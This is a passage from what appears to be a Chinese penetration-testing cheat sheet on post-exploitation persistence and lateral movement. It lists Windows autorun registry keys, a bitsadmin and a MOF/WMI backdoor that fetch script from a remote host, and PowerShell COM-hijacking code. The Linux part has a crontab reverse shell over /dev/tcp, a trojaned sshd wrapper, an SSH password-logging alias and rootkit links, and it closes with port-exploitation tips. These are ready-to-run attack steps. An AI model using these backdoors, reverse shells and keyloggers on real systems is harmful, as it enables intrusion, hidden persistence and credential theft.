class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</span></span><span class="line"><span style="color: #babed8">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</span></span></code></pre></div><p>管理员 </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</span></span><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</span></span><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</span></span></code></pre></div><h5 id="4、BootExecute-Key"><a href="#4、BootExecute-Key" class="headerlink" title="4、BootExecute Key"></a>4、BootExecute Key</h5><p>由于smss.exe在Windows子系统加载之前启动,因此会调用配置子系统来加载当前的配置单元,具体注册表键值为:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">HKLM\SYSTEM\CurrentControlSet\Control\hivelist</span></span><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Session Manager</span></span></code></pre></div><h5 id="5、Userinit-Key"><a href="#5、Userinit-Key" class="headerlink" title="5、Userinit Key"></a>5、Userinit Key</h5><p>WinLogon进程加载的login scripts,具体键值:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span 
class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</span></span></code></pre></div><h5 id="6、Startup-Keys"><a href="#6、Startup-Keys" class="headerlink" title="6、Startup Keys"></a>6、Startup Keys</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</span></span><span class="line"><span style="color: #babed8">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</span></span><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</span></span><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</span></span></code></pre></div><h5 id="7、Services"><a href="#7、Services" class="headerlink" title="7、Services"></a>7、Services</h5><p>创建服务 </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">sc create [ServerName] binPath= BinaryPathName</span></span></code></pre></div><h5 id="8、Browser-Helper-Objects"><a href="#8、Browser-Helper-Objects" class="headerlink" title="8、Browser Helper Objects"></a>8、Browser Helper Objects</h5><p>本质上是Internet Explorer启动时加载的DLL模块</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: 
#1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects</span></span></code></pre></div><h5 id="9、AppInit-DLLs"><a href="#9、AppInit-DLLs" class="headerlink" title="9、AppInit_DLLs"></a>9、AppInit_DLLs</h5><p>DLLs loaded into every process that loads User32.dll</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs</span></span></code></pre></div><h5 id="10、文件关联"><a href="#10、文件关联" class="headerlink" title="10、File Associations"></a>10、File Associations</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\Software\Classes</span></span><span class="line"><span style="color: #babed8">HKEY_CLASSES_ROOT</span></span></code></pre></div><h5 id="11、bitsadmin"><a href="#11、bitsadmin" class="headerlink" title="11、bitsadmin"></a>11、<a href="http://www.liuhaihua.cn/archives/357579.html">bitsadmin</a></h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">bitsadmin /create backdoor</span></span><span class="line"><span style="color: #babed8">bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe</span></span><span class="line"><span style="color: #babed8">bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://host.com/calc.sct scrobj.dll"</span></span><span class="line"><span style="color: #babed8">bitsadmin /Resume 
backdoor</span></span></code></pre></div><h5 id="12、mof"><a href="#12、mof" class="headerlink" title="12、mof "></a>12、<a href="https://evi1cg.me/archives/Powershell_MOF_Backdoor.html">mof </a></h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">pragma namespace("\\\\.\\root\\subscription") </span></span><span class="line"><span style="color: #babed8">instance of __EventFilter as $EventFilter</span></span><span class="line"><span style="color: #babed8">{</span></span><span class="line"><span style="color: #babed8">EventNamespace = "Root\\Cimv2";</span></span><span class="line"><span style="color: #babed8">Name = "filtP1";</span></span><span class="line"><span style="color: #babed8">Query = "Select * From __InstanceModificationEvent "</span></span><span class="line"><span style="color: #babed8">"Where TargetInstance Isa \"Win32_LocalTime\" "</span></span><span class="line"><span style="color: #babed8">"And TargetInstance.Second = 1";</span></span><span class="line"><span style="color: #babed8">QueryLanguage = "WQL";</span></span><span class="line"><span style="color: #babed8">}; </span></span><span class="line"><span style="color: #babed8">instance of ActiveScriptEventConsumer as $Consumer</span></span><span class="line"><span style="color: #babed8">{</span></span><span class="line"><span style="color: #babed8">Name = "consP1";</span></span><span class="line"><span style="color: #babed8">ScriptingEngine = "JScript";</span></span><span class="line"><span style="color: #babed8">ScriptText = "GetObject(\"script:https://host.com/test\")";</span></span><span class="line"><span style="color: #babed8">}; </span></span><span class="line"><span style="color: #babed8">instance of __FilterToConsumerBinding</span></span><span class="line"><span style="color: 
#babed8">{</span></span><span class="line"><span style="color: #babed8">Consumer = $Consumer;</span></span><span class="line"><span style="color: #babed8">Filter = $EventFilter;</span></span><span class="line"><span style="color: #babed8">};</span></span></code></pre></div><p>Run as administrator:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">mofcomp test.mof</span></span></code></pre></div><h5 id="13、wmi"><a href="#13、wmi" class="headerlink" title="13、wmi"></a>13、<a href="https://3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe">wmi</a></h5><p>Runs notepad.exe every 60 seconds</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"</span></span><span class="line"><span style="color: #babed8">wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32\notepad.exe",CommandLineTemplate="C:\Windows\System32\notepad.exe"</span></span><span class="line"><span style="color: #babed8">wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""</span></span></code></pre></div><h5 id="14、Userland-Persistence-With-Scheduled-Tasks"><a href="#14、Userland-Persistence-With-Scheduled-Tasks" class="headerlink" title="14、Userland Persistence With Scheduled 
Tasks"></a>14、<a href="https://3gstudent.github.io/Userland-registry-hijacking">Userland Persistence With Scheduled Tasks</a></h5><p>Hijacks the UserTask scheduled task so that a DLL is loaded at system startup</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">function Invoke-ScheduledTaskComHandlerUserTask</span></span><span class="line"><span style="color: #babed8">{</span></span><span class="line"><span style="color: #babed8">[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]</span></span><span class="line"><span style="color: #babed8">Param (</span></span><span class="line"><span style="color: #babed8">[Parameter(Mandatory = $True)]</span></span><span class="line"><span style="color: #babed8">[ValidateNotNullOrEmpty()]</span></span><span class="line"><span style="color: #babed8">[String]</span></span><span class="line"><span style="color: #babed8">$Command,</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">[Switch]</span></span><span class="line"><span style="color: #babed8">$Force</span></span><span class="line"><span style="color: #babed8">)</span></span><span class="line"><span style="color: #babed8">$ScheduledTaskCommandPath = "HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32"</span></span><span class="line"><span style="color: #babed8">if ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){</span></span><span class="line"><span style="color: #babed8">New-Item $ScheduledTaskCommandPath -Force |</span></span><span class="line"><span style="color: #babed8">New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null</span></span><span class="line"><span style="color: 
#babed8">}else{</span></span><span class="line"><span style="color: #babed8">Write-Verbose "Key already exists, consider using -Force"</span></span><span class="line"><span style="color: #babed8">exit</span></span><span class="line"><span style="color: #babed8">}</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">if (Test-Path $ScheduledTaskCommandPath) {</span></span><span class="line"><span style="color: #babed8">Write-Verbose "Created registry entries to hijack the UserTask"</span></span><span class="line"><span style="color: #babed8">}else{</span></span><span class="line"><span style="color: #babed8">Write-Warning "Failed to create registry key, exiting"</span></span><span class="line"><span style="color: #babed8">exit</span></span><span class="line"><span style="color: #babed8">} </span></span><span class="line"><span style="color: #babed8">}</span></span><span class="line"><span style="color: #babed8">Invoke-ScheduledTaskComHandlerUserTask -Command "C:\test\testmsg.dll" -Verbose</span></span></code></pre></div><h5 id="15、Netsh"><a href="#15、Netsh" class="headerlink" title="15、Netsh"></a>15、<a href="https://3gstudent.github.io/Netsh-persistence">Netsh</a></h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">netsh add helper c:\test\netshtest.dll</span></span></code></pre></div><p>Trigger: every time netsh is invoked</p><blockquote><p>DLL authoring: <a href="https://github.com/outflanknl/NetshHelperBeacon">https://github.com/outflanknl/NetshHelperBeacon</a></p></blockquote><h5 id="16、Shim"><a href="#16、Shim" class="headerlink" title="16、Shim"></a>16、<a href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Compatibility-Shims">Shim</a></h5><p>Common approaches:<br>InjectDll<br>RedirectShortcut<br>RedirectEXE</p><h5 id="17、DLL劫持"><a href="#17、DLL劫持" class="headerlink" title="17、DLL Hijacking"></a>17、<a 
href="https://3gstudent.github.io/DLL%E5%8A%AB%E6%8C%81%E6%BC%8F%E6%B4%9E%E8%87%AA%E5%8A%A8%E5%8C%96%E8%AF%86%E5%88%AB%E5%B7%A5%E5%85%B7Rattler%E6%B5%8B%E8%AF%95">DLL Hijacking</a></h5><p>Rattler automatically enumerates processes and checks whether any of them can be exploited through DLL hijacking<br>Usage: semi-automatic testing with Procmon is more precise; a DLL generated the usual way makes the program error out or abort, whereas hijacking source generated with AheadLib does not disturb program execution<br>Tool: <a href="https://github.com/sensepost/rattler">https://github.com/sensepost/rattler</a><br>Tool: <a href="https://github.com/Yonsm/AheadLib">https://github.com/Yonsm/AheadLib</a></p><h5 id="18、DoubleAgent"><a href="#18、DoubleAgent" class="headerlink" title="18、DoubleAgent "></a>18、<a href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Verifier(DoubleAgent%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D)">DoubleAgent </a></h5><p>Write a custom Verifier provider DLL<br>Install it through Application Verifier<br>It is injected into the target process and executes the payload<br>The payload runs every time the target process starts, which amounts to an autostart mechanism<br>POC : <a href="https://github.com/Cybellum/DoubleAgent">https://github.com/Cybellum/DoubleAgent</a></p><h5 id="19、waitfor-exe"><a href="#19、waitfor-exe" class="headerlink" title="19、waitfor.exe "></a>19、<a href="https://3gstudent.github.io/Use-Waitfor.exe-to-maintain-persistence">waitfor.exe </a></h5><p>No autostart support, but it can be activated remotely on demand; the background process shows up as waitfor.exe<br>POC : <a href="https://github.com/3gstudent/Waitfor-Persistence">https://github.com/3gstudent/Waitfor-Persistence</a></p><h5 id="20、AppDomainManager"><a href="#20、AppDomainManager" class="headerlink" title="20、AppDomainManager"></a>20、<a href="https://3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence">AppDomainManager</a></h5><p>For .Net programs: modifying the AppDomainManager hijacks the startup of a .Net program. Hijacking the startup of a common system .Net program such as powershell.exe and adding a payload to it yields a passive backdoor trigger</p><h5 id="21、Office"><a href="#21、Office" class="headerlink" title="21、Office"></a>21、Office</h5><p><a href="https://3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91DLL%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8">Hijacking specific Office functionality</a>: via DLL hijacking, the backdoor fires when Office performs a specific function<br><a 
href="https://3gstudent.github.io/%E5%88%A9%E7%94%A8VSTO%E5%AE%9E%E7%8E%B0%E7%9A%84office%E5%90%8E%E9%97%A8">Office backdoor implemented with VSTO</a><br><a href="https://github.com/3gstudent/Office-Persistence">Office add-ins</a></p><ul><li>Word WLL</li><li>Excel XLL</li><li>Excel VBA add-ins</li><li>PowerPoint VBA add-ins</li></ul><blockquote><p>Reference 1: <a href="https://3gstudent.github.io/Use-Office-to-maintain-persistence">https://3gstudent.github.io/Use-Office-to-maintain-persistence</a></p></blockquote><blockquote><p>Reference 2: <a href="https://3gstudent.github.io/Office-Persistence-on-x64-operating-system">https://3gstudent.github.io/Office-Persistence-on-x64-operating-system</a></p></blockquote><h5 id="22、CLR"><a href="#22、CLR" 
class="headerlink" title="22、CLR"></a>22、<a href="https://3gstudent.github.io/Use-CLR-to-maintain-persistence">CLR</a></h5><p>A backdoor that needs no administrator privileges and can hijack every .Net program<br>POC: <a href="https://github.com/3gstudent/CLR-Injection">https://github.com/3gstudent/CLR-Injection</a></p><h5 id="23、msdtc"><a href="#23、msdtc" class="headerlink" title="23、msdtc"></a>23、<a href="https://3gstudent.github.io/Use-msdtc-to-maintain-persistence">msdtc</a></h5><p>Uses the MSDTC service to load a DLL, giving autostart while evading Autoruns' startup-item checks<br>Usage: place a DLL renamed to oci.dll in the %windir%\system32\ directory</p><h5 id="24、Hijack-CAccPropServicesClass-and-MMDeviceEnumerato"><a href="#24、Hijack-CAccPropServicesClass-and-MMDeviceEnumerato" class="headerlink" title="24、Hijack CAccPropServicesClass and MMDeviceEnumerato"></a>24、<a href="https://3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-CAccPropServicesClass-and-MMDeviceEnumerator">Hijack CAccPropServicesClass and MMDeviceEnumerato</a></h5><p>Uses COM objects; no reboot and no administrator privileges required<br>Implemented by modifying the registry<br>POC: <a href="https://github.com/3gstudent/COM-Object-hijacking">https://github.com/3gstudent/COM-Object-hijacking</a></p><h5 id="25、Hijack-explorer-exe"><a href="#25、Hijack-explorer-exe" class="headerlink" title="25、Hijack explorer.exe"></a>25、<a href="https://3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-explorer.exe">Hijack explorer.exe</a></h5><p>COM object hijacking; no reboot and no administrator privileges required<br>Implemented by modifying the registry</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">HKCU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}</span></span><span class="line"><span style="color: #babed8">HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}</span></span><span class="line"><span style="color: #babed8">HKCU\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}</span></span><span 
class="line"><span style="color: #babed8">HKCU\Software\Classes\Wow6432Node\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E}</span></span></code></pre></div><h5 id="26、Windows-FAX-DLL-Injection"><a href="#26、Windows-FAX-DLL-Injection" class="headerlink" title="26、Windows FAX DLL Injection"></a>26、Windows FAX DLL Injection</h5><p>DLL hijacking of Explorer.exe's load of <code>fxsst.dll</code><br>At startup Explorer.exe loads <code>c:\Windows\System32\fxsst.dll</code> (the fax service, enabled by default). Saving payload.dll as <code>c:\Windows\fxsst.dll</code> hijacks Explorer.exe's load of <code>fxsst.dll</code></p><h5 id="27、特殊注册表键值"><a href="#27、特殊注册表键值" class="headerlink" title="27、Special registry values"></a>27、Special registry values</h5><p>Create a registry value with a special name under the registry Run keys: under normal conditions users cannot read it (via the Win32 API), but the system can still execute it (via the Native API).</p><p><a href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E5%88%9B%E5%BB%BA">Penetration Tips: Creating a “Hidden” Registry Key</a></p><p><a href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E6%9B%B4%E5%A4%9A%E6%B5%8B%E8%AF%95">Penetration Tips: More Tests on “Hidden” Registry Keys</a></p><h5 id="28、快捷方式后门"><a href="#28、快捷方式后门" class="headerlink" title="28、Shortcut Backdoor"></a>28、Shortcut Backdoor</h5><p>Replace the launch arguments of the My Computer shortcut<br>POC : <a href="https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Backdoor/LNK_backdoor.ps1">https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Backdoor/LNK_backdoor.ps1</a></p><h5 id="29、Logon-Scripts"><a href="#29、Logon-Scripts" class="headerlink" title="29、Logon Scripts"></a>29、<a href="https://3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence">Logon Scripts</a></h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">New-ItemProperty "HKCU:\Environment\" UserInitMprLogonScript -value "c:\test\11.bat" -propertyType string | 
Out-Null</span></span></code></pre></div><h5 id="30、Password-Filter-DLL"><a href="#30、Password-Filter-DLL" class="headerlink" title="30、Password Filter DLL"></a>30、<a href="https://3gstudent.github.io/Password-Filter-DLL%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8">Password Filter DLL</a></h5><h5 id="31、利用BHO实现IE浏览器劫持"><a href="#31、利用BHO实现IE浏览器劫持" class="headerlink" title="31、IE browser hijacking via BHO"></a>31、<a href="https://3gstudent.github.io/%E5%88%A9%E7%94%A8BHO%E5%AE%9E%E7%8E%B0IE%E6%B5%8F%E8%A7%88%E5%99%A8%E5%8A%AB%E6%8C%81">IE browser hijacking via BHO</a></h5><h4 id="Linux-2"><a href="#Linux-2" class="headerlink" title="Linux"></a>Linux</h4><h5 id="crontab"><a href="#crontab" class="headerlink" title="crontab"></a>crontab</h5><p>Sends a reverse shell to port 53 of dns.wuyun.org every 60 minutes</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#!bash</span></span><span class="line"><span style="color: #babed8">(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -</span></span></code></pre></div><h5 id="硬链接sshd"><a href="#硬链接sshd" class="headerlink" title="Hard-linked sshd"></a>Hard-linked sshd</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#!bash</span></span><span class="line"><span style="color: #babed8">ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333;</span></span></code></pre></div><p>Connect: ssh <a href="mailto:root@192.168.206.142">root@192.168.206.142</a> -p 2333</p><h5 id="SSH-Server-wrapper"><a href="#SSH-Server-wrapper" class="headerlink" title="SSH Server wrapper"></a>SSH Server 
wrapper</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#!bash</span></span><span class="line"><span style="color: #babed8">cd /usr/sbin</span></span><span class="line"><span style="color: #babed8">mv sshd ../bin</span></span><span class="line"><span style="color: #babed8">echo '#!/usr/bin/perl' >sshd</span></span><span class="line"><span style="color: #babed8">echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd</span></span><span class="line"><span style="color: #babed8">echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd</span></span><span class="line"><span style="color: #babed8">chmod u+x sshd</span></span><span class="line"><span style="color: #babed8"># works without a restart as well</span></span><span class="line"><span style="color: #babed8">/etc/init.d/sshd restart</span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">socat STDIO TCP4:192.168.206.142:22,sourceport=13377</span></span></code></pre></div><h5 id="SSH-keylogger"><a href="#SSH-keylogger" class="headerlink" title="SSH keylogger"></a>SSH keylogger</h5><p>Open the current user's .bashrc in vim and append at the end:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#!bash</span></span><span class="line"><span style="color: #babed8">alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'</span></span></code></pre></div><p>source .bashrc</p><h5 id="Cymothoa-进程注入backdoor"><a 
href="#Cymothoa-进程注入backdoor" class="headerlink" title="Cymothoa process-injection backdoor"></a>Cymothoa process-injection backdoor</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">./cymothoa -p 2270 -s 1 -y 7777</span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">nc -vv ip 7777</span></span></code></pre></div><h5 id="rootkit"><a href="#rootkit" class="headerlink" title="rootkit"></a>rootkit</h5><ul><li><a href="http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz">openssh_rootkit</a></li><li><a href="http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz">Kbeast_rootkit</a></li><li>Mafix + Suterusu rootkit</li></ul><h5 id="Tools"><a href="#Tools" class="headerlink" title="Tools"></a>Tools</h5><ul><li><a href="https://github.com/Screetsec/Vegile">Vegile</a></li><li><a href="https://github.com/icco/backdoor">backdoor</a></li></ul><h3 id="WEB后门"><a href="#WEB后门" class="headerlink" title="Web Backdoors"></a>Web Backdoors</h3><p>PHP Meterpreter backdoor<br>Aspx Meterpreter backdoor<br>weevely<br>webacoo<br>….</p><h2 id="横向渗透"><a href="#横向渗透" class="headerlink" title="Lateral Movement"></a>Lateral Movement</h2><h3 id="端口渗透"><a href="#端口渗透" class="headerlink" title="Port-based Penetration"></a>Port-based Penetration</h3><h4 id="端口扫描-1"><a href="#端口扫描-1" class="headerlink" title="Port Scanning"></a>Port Scanning</h4><ul><li>1. Port fingerprint (version information)</li><li>2. Service running on the port</li><li>3. Common default port numbers</li><li>4. Try weak passwords</li></ul><h4 id="端口爆破"><a href="#端口爆破" class="headerlink" title="Port Brute-forcing"></a>Port Brute-forcing</h4><p><a href="https://github.com/vanhauser-thc/thc-hydra">hydra</a></p><h4 id="端口弱口令"><a href="#端口弱口令" class="headerlink" title="Weak Passwords on Ports"></a>Weak Passwords on Ports</h4><ul><li>NTScan 
</li><li>Hscan</li><li>Custom scripts</li></ul><h4 id="端口溢出"><a href="#端口溢出" class="headerlink" title="Port Overflows"></a>Port Overflows</h4><p><strong>smb</strong></p><ul><li>ms08067</li><li>ms17010</li><li>ms11058</li><li>…</li></ul><p><strong>apache</strong><br><strong>ftp</strong><br><strong>…</strong></p><h4 id="常见的默认端口"><a href="#常见的默认端口" class="headerlink" title="Common Default Ports"></a>Common Default Ports</h4><h5 id="1、web类-web漏洞-敏感目录"><a href="#1、web类-web漏洞-敏感目录" class="headerlink" title="1、Web (web vulnerabilities / sensitive directories)"></a>1、Web (web vulnerabilities / sensitive directories)</h5><p>Vulnerabilities in common third-party components: struts thinkphp jboss ganglia zabbix …</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">80 web</span></span><span class="line"><span style="color: #babed8">80-89 web</span></span><span class="line"><span style="color: #babed8">8000-9090 web</span></span></code></pre></div><h5 id="2、数据库类-扫描弱口令"><a href="#2、数据库类-扫描弱口令" class="headerlink" title="2、Databases (weak-password scanning)"></a>2、Databases (weak-password scanning)</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">1433 MSSQL</span></span><span class="line"><span style="color: #babed8">1521 Oracle</span></span><span class="line"><span style="color: #babed8">3306 MySQL</span></span><span class="line"><span style="color: #babed8">5432 PostgreSQL</span></span><span class="line"><span style="color: #babed8">50000 DB2</span></span></code></pre></div><h5 id="3、特殊服务类-未授权-命令执行类-漏洞"><a href="#3、特殊服务类-未授权-命令执行类-漏洞" class="headerlink" title="3、Special services (unauthenticated access / command execution / vulnerabilities)"></a>3、Special services (unauthenticated access / command execution / vulnerabilities)</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" 
style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">443 SSL Heartbleed</span></span><span class="line"><span style="color: #babed8">445 ms08067/ms11058/ms17010 etc.</span></span><span class="line"><span style="color: #babed8">873 Rsync unauthenticated access</span></span><span class="line"><span style="color: #babed8">5984 CouchDB http://xxx:5984/_utils/</span></span><span class="line"><span style="color: #babed8">6379 redis unauthenticated access</span></span><span class="line"><span style="color: #babed8">7001,7002 WebLogic default weak passwords, deserialization</span></span><span class="line"><span style="color: #babed8">9200,9300 elasticsearch, see WooYun: ElasticSearch command execution vulnerability on a Duowan server</span></span><span class="line"><span style="color: #babed8">11211 memcache unauthenticated access</span></span><span class="line"><span style="color: #babed8">27017,27018 Mongodb unauthenticated access</span></span><span class="line"><span style="color: #babed8">50000 SAP command execution</span></span><span class="line"><span style="color: #babed8">50070,50030 hadoop default ports, unauthenticated access</span></span></code></pre></div><h5 id="4、常用端口类-扫描弱口令-端口爆破"><a href="#4、常用端口类-扫描弱口令-端口爆破" class="headerlink" title="4、Common ports (weak-password scanning / brute-forcing)"></a>4、Common ports (weak-password scanning / brute-forcing)</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">21 ftp</span></span><span class="line"><span style="color: #babed8">22 SSH</span></span><span class="line"><span style="color: #babed8">23 Telnet</span></span><span class="line"><span style="color: #babed8">445 SMB weak-password scanning</span></span><span class="line"><span style="color: #babed8">2601,2604 zebra routing, default password zebra</span></span><span class="line"><span 